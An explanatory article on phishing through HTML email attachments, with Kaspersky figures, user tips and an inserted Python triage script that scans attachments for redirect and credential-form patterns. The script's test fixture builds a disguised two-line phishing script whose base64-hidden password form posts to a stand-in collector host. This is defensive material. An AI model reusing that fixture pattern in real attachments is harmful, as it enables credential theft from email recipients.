How to avoid phishing emails
Hackers are continuously seeking new ways to evade antivirus systems, and attaching HTML documents to an email is one of the most prevalent methods.
Malicious HTML attachments hide phishing content better than email body links because they are less likely to be detected by email filters.
Popular antivirus service Kaspersky has identified two primary forms of HTML attachments used by cybercriminals: HTML files that contain a link to a fake website, and HTML files that are themselves a complete phishing page.
With the first form, an attacker hides a link in the attached file and automatically redirects a prospective victim to a fraudulent site. The second form, in contrast, lets the attacker skip building a phoney website and save on hosting costs.
In the first four months of this year, Kaspersky discovered approximately 2 million emails with malicious HTML files.
Attaching phishing URLs to emails
Attackers who use this approach obfuscate the code, rearranging it so that it is difficult to understand. Some fraudsters employ a variety of ready-made tools to make the original code more difficult to recover.
Another method of concealing phishing material in email attachments is to encode or compress the code, which makes it appear smaller than it really is. Kaspersky recently discovered a malicious HTML attachment containing a full-fledged phishing page encoded in a tiny, two-line script.
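A defender-side triage sketch for the obfuscation described above, added here as an example (it is not Kaspersky's or the original article's code): it scans HTML attachments for redirect, credential-form and runtime-decoding indicators, and decodes long base64 blobs so that a page hidden inside a two-line script is still inspected. The indicator names, the patterns and the sample message are constructed assumptions.

```python
import base64, binascii, email, re
from email import policy
from email.message import EmailMessage

# Heuristic patterns: this example's own assumptions, not a vendor's detection rules.
INDICATORS = {
    "redirect": re.compile(r"http-equiv\s*=\s*[\"']?refresh|\blocation(?:\.href)?\s*=|location\.replace\s*\(", re.I),
    "credential_form": re.compile(r"<input[^>]+type\s*=\s*[\"']?password", re.I),
    "runtime_decode": re.compile(r"\b(?:atob|unescape|eval)\s*\(|document\.write\s*\(", re.I),
}
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")

def unwrap(text, depth=3):
    """Return [text, decoded blob, ...] so markup hidden in base64 is scanned too."""
    layers = [text]
    for blob in (B64_BLOB.findall(text) if depth else []):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            continue  # not valid base64 after all
        layers += unwrap(decoded, depth - 1)
    return layers

def triage(raw: bytes) -> dict:
    """Map each HTML attachment to its indicators; 'decoded:' marks ones seen only after decoding."""
    report = {}
    for part in email.message_from_bytes(raw, policy=policy.default).walk():
        name = (part.get_filename() or "").lower()
        is_html = part.get_content_type() == "text/html" or name.endswith((".html", ".htm"))
        if part.get_content_disposition() != "attachment" or not is_html:
            continue
        layers = unwrap((part.get_payload(decode=True) or b"").decode("utf-8", "replace"))
        hits = set()
        for i, layer in enumerate(layers):
            hits |= {k if i == 0 else "decoded:" + k for k, rx in INDICATORS.items() if rx.search(layer)}
        report[name] = sorted(hits)
    return report

def sample_message() -> bytes:
    """Constructed sample: a two-line script that writes out a base64-encoded login form."""
    page = b"<form action='https://collector.example/'><input type='password' name='p'></form>" * 3
    html = '<script>\ndocument.write(atob("%s"));\n</script>\n' % base64.b64encode(page).decode()
    msg = EmailMessage()
    msg.set_content("See attached.")
    msg.add_attachment(html, subtype="html", filename="invoice.html")
    return msg.as_bytes()

if __name__ == "__main__":
    print(triage(sample_message()))
```

On the constructed sample the password field is reported only as `decoded:credential_form`, which is why a filter that matches the raw attachment text alone would miss it. Long base64 blobs also occur in benign inline images, so the decoded layer is scanned for indicators rather than flagged by its mere presence.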
How to avoid phishing emails
Phishing sites often replicate the look and feel of trustworthy websites in order to fool unsuspecting users into handing over their personal information. Even when a fake website is almost an exact replica of the real thing, it’s easy to spot by looking for spelling mistakes or by checking the URL in your browser’s address bar.
You should never use an email to access a company’s login page; instead, go to the company’s website or use a search engine to find the login page. If you do this, you’ll be sure you’re not visiting a bogus site impersonating a well-known brand or company.
To protect yourself from phishing, avoid opening emails from unknown senders. Cybercriminals can use an appearance of urgency in their messages as a means of luring their victims.
Anyone who receives an email from an unknown sender should not open the email or any attachments it contains. Emails typically include Word documents, PDFs, and other office files, but web pages seldom arrive as HTML attachments, so if you see one in your inbox you can nearly always be sure you’re receiving a phishing email.
Because phishing attempts so frequently target login credentials, it is essential that you use a password manager to store your credentials safely and to automatically generate strong, complex passwords for every one of your online accounts.